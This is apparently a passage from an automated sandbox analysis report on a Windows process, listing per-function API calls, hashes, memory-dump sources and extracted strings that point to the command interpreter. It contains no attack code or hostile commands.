                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2db095af38200b377484f67135295a8895ffd9d7af2aba5c2d40f05d7d6c7967
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 818215c9f1f1d3df2516d48e320f03e98c735a01d45be307fdb3a91f89e7496d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2db095af38200b377484f67135295a8895ffd9d7af2aba5c2d40f05d7d6c7967
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CC1F6716043498BC714EF25C841A7AB7E2EFD8348F18992DF986AB391EB31DD41DB42
                                                                                                                                                                                                                                                                                                                                                      Function 00EF6B40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00EF6C76,00EE1000), ref: 00EF6B47
                                                                                                                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(vl,?,00EF6C76,00EE1000), ref: 00EF6B50
                                                                                                                                                                                                                                                                                                                                                      • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00EF6C76,00EE1000), ref: 00EF6B5B
                                                                                                                                                                                                                                                                                                                                                      • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00EF6C76,00EE1000), ref: 00EF6B62
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                                                                                                                      • String ID: vl
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3231755760-3044229138
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8d9e489088cb555ba73e9a910507fdaeb0984967b35d27b3bade0f20d07ae468
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a2337f6a919988f4bc76ec21c384e82cc83699b800f70e839e74552172269dab
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d9e489088cb555ba73e9a910507fdaeb0984967b35d27b3bade0f20d07ae468
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CED0127204010CFFCB202BE1EC0CA493F28EB44352F004040F30DC2061CB364417AB6B
                                                                                                                                                                                                                                                                                                                                                      Function 00EF0740 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF08D9
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF08F3
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EF090B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcstol$Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2343214347-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 51941a31f515dbf34b3e27932960b3d767218a29edd9246c749bf6957b863c7a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 729602f75c74eaa2e5c7efaa973ec15f30e853b23d3631adadbe02d0fcb7190a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51941a31f515dbf34b3e27932960b3d767218a29edd9246c749bf6957b863c7a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEA18270A0025D8BDB28DFA5CC555BEB7F6EF84304B14A02DEA01E7392EB70AC41DB91
                                                                                                                                                                                                                                                                                                                                                      Function 00EE6B20 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • _pipe.MSVCRT ref: 00EE6B4F
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE6BF7
                                                                                                                                                                                                                                                                                                                                                      • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00EE6C05
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: memset.MSVCRT ref: 00EEE9A0
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: wcschr.MSVCRT ref: 00EEE9FC
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: wcschr.MSVCRT ref: 00EEEA14
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE950: _wcsicmp.MSVCRT ref: 00EEEA80
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EE6D8F
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001), ref: 00EFA6D8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA1A8: _dup.MSVCRT ref: 00EEA1AF
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA1D6: _dup2.MSVCRT ref: 00EEA1EA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA16C: _close.MSVCRT ref: 00EEA19B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1441200171-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a55918a776136e47f7242d748c77fa8c52dfacd84a682fee549364618c72a014
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0b81aee450d50edbab66d36ee109de8cd755919a87a43476a2dd7b4af5c82576
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a55918a776136e47f7242d748c77fa8c52dfacd84a682fee549364618c72a014
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7491F5716002488FDB24EF25DC86A7AB7E1EB84364F19952DF56AE7291DB30EC01DB41
                                                                                                                                                                                                                                                                                                                                                      Function 00F02E37 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,?,00F02FDD), ref: 00F02E5D
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: DebuggerPresent
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1347740429-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: cafcbf6b338250b4b85272d05671f93b45d0c8161a5ae03008a8c5dffb2a9322
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 729fd9d3c6dccc069cf84099899eb88755cff1baeb96fff13d1ec6ea87392ceb
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cafcbf6b338250b4b85272d05671f93b45d0c8161a5ae03008a8c5dffb2a9322
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CE0C231FC62399BDB715B64EC9C3B9368C2B11BA0F440466E425CB1D1C794DC06BBB0
                                                                                                                                                                                                                                                                                                                                                      Function 00EE9458 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 328threadprocessstringCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,00F0C9D0,00000108,00EF2107,?,00000000,00000000,00000000), ref: 00EE94AA
                                                                                                                                                                                                                                                                                                                                                      • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 00EE94D9
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE94F1
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE954A
                                                                                                                                                                                                                                                                                                                                                      • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 00EE955D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1D90: _wcsnicmp.MSVCRT ref: 00EF1E14
                                                                                                                                                                                                                                                                                                                                                      • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 00EE95B8
                                                                                                                                                                                                                                                                                                                                                      • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00EE9602
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00EE9624
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00EFBDF1
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 00EFBE0D
                                                                                                                                                                                                                                                                                                                                                      • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 00EFBE26
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1449572041-3461277227
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b18edb813cd6f931aef25c6f6e2eee51f071a5d64487949a35477fa1407e74da
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1bfeb301876c68201616c24dba3e67bcf1ce51dc4f8c227d21f9195f3de6bd63
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b18edb813cd6f931aef25c6f6e2eee51f071a5d64487949a35477fa1407e74da
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36C19F71A0035D9FDB249F65CC45BFA77F8EB44304F1460AAE60AF6281EB708985DF62
                                                                                                                                                                                                                                                                                                                                                      Function 00EE4710 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 435fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE4781
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE47E4
                                                                                                                                                                                                                                                                                                                                                      • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00EE47EC
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE47FD
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00EE4805
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA16C: _close.MSVCRT ref: 00EEA19B
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE4832
                                                                                                                                                                                                                                                                                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00EE483A
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EE4871
                                                                                                                                                                                                                                                                                                                                                      • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000001), ref: 00EF8120
                                                                                                                                                                                                                                                                                                                                                      • memmove.MSVCRT(?,?,?), ref: 00EF8191
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,?,00000000), ref: 00EF8328
                                                                                                                                                                                                                                                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EF832F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: _get_osfhandle.MSVCRT ref: 00EEDDA3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File_get_osfhandle$memset$ConsoleHandlePathPointerReadSearchSizeTypeWrite_closememmove
                                                                                                                                                                                                                                                                                                                                                      • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2545859659-2010427443
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b5da1bba365330611ab52d0f670b0440b5cade2d76b05e7b3e3f493d2575764d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 45d8c4fd596414c4497e7ede6e3cae5911e1aa3cfa5ecc6f72785100fa083e8c
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5da1bba365330611ab52d0f670b0440b5cade2d76b05e7b3e3f493d2575764d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AF1E0716083499FD724CF20C944B7BB7E8FB88714F106A2EF699A7290DB70D905CB92
                                                                                                                                                                                                                                                                                                                                                      Function 00EEE0B0 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp$iswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 759518647-875390083
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 65a35c9d055fd0f120826579c41c8d432e090fedbe69f2b04ee7fe9ba7314f64
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c6e9dfca029a27c997cd6d4386a59dd08911b9bdf12a8af6587b2497eaade094
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65a35c9d055fd0f120826579c41c8d432e090fedbe69f2b04ee7fe9ba7314f64
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01A1093124474F87D738AB26AC1A77633A4EB40708F14642EE742B61D1DFE5E882EB16
                                                                                                                                                                                                                                                                                                                                                      Function 00EECF10 Relevance: 33.7, APIs: 15, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: iswdigit$iswspacewcschr$_setjmp3
                                                                                                                                                                                                                                                                                                                                                      • String ID: ()|&=,;"$=,;$@$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 684130364-3872429996
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 70b45cacd312222db46c157461b2aef9374d6851996afe85f68024acc3988307
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 12744accecbe24fd778c94e0d852d4156de1f6930480634b6d8aff8b263220f2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70b45cacd312222db46c157461b2aef9374d6851996afe85f68024acc3988307
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEE12771A092CD8BCB308F6B9C453BA37E6AF55348F286026ED05FB2A1E334CD419756
                                                                                                                                                                                                                                                                                                                                                      Function 00EEEC2E Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F0E590,00002000,?,00F28BF0,00000000,?,?,00EE8F0D), ref: 00EEEC51
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EEEC77
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EEEC8D
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EEECA3
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EEECB9
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EEECCF
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EEECE5
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EEECF7
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EEED0D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00F0E590,?,00002000), ref: 00EE9342
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE9356
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00EE936A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE937E
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                                                                                                                                                                                                                                                                                                      • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
